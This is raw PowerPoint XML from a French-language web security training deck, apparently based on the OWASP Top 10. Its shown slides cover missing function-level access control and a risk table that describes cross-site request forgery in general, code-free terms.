              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sein</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des couches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contrôleur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et Métier.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Manque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>contrôle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>d’accès</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>niveau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fonctionnel</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>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A7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="29886" y="989030"/>
            <a:ext cx="6655242" cy="503768"/>
            <a:chOff x="29886" y="989030"/>
            <a:chExt cx="6655242" cy="503768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="29886" y="989030"/>
              <a:ext cx="6655242" cy="503768"/>
              <a:chOff x="29886" y="971858"/>
              <a:chExt cx="6655242" cy="503768"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2894811" y="1013264"/>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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnérabilités</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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24647"/>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err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’attaque</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4799159" y="97185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en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>techniques</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198689"/>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a:off x="2228079" y="1203243"/>
                <a:ext cx="515121" cy="5196"/>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p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3898407" y="1205891"/>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29886" y="1280701"/>
                <a:ext cx="1066319" cy="194925"/>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Agents de menace</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="995685"/>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Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>métier</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1203343"/>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94811" y="1035112"/>
              <a:ext cx="153189"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74174" y="1197259"/>
              <a:ext cx="45719" cy="5670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550994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1333544116"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="809657"/>
          <a:ext cx="6858000" cy="3180309"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1196752"/>
                <a:gridCol w="1152128"/>
                <a:gridCol w="1080120"/>
                <a:gridCol w="1224136"/>
                <a:gridCol w="1080120"/>
                <a:gridCol w="1124744"/>
              </a:tblGrid>
              <a:tr h="635229">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just"/>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just"/>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pPr algn="just"/>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pPr algn="just"/>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just"/>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92499">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>   Application</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000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Mise en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>oeuvre</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MOYENNE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n-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>COURANT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n-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Détectabilité</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>FACILE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERE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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>   Application/Métier</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5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0" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Tout accès de vos utilisateurs à un site web, ou à une source HTML, peut charger du contenu dans leur navigateur. Et, un contenu, spécialement  forgé, peut  permettre  que leur navigateur génère une requête automatique vers votre site.  </a:t>
                      </a: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kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>L’attaquant forge une requête HTTP  et, par le biais d'une balise image, d'une faille </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> ou d’une autre technique,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>force le navigateur à émettre la requête, à l'insu de l’utilisateur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Si ce</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> dernier</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> est authentifié, l’attaque va réussir.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>exploite</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> le fait </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>que</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>plupart</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des applications web </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>permettent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> aux </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>attaquants</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>prévoir</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>tous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>détails</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>certaines</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ctions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.  </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0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Et, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>comme</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>navigateurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>envoient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>automatiquement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>informations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’authentification</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>tels</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>que</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les cookies de session, les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>attaquants</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
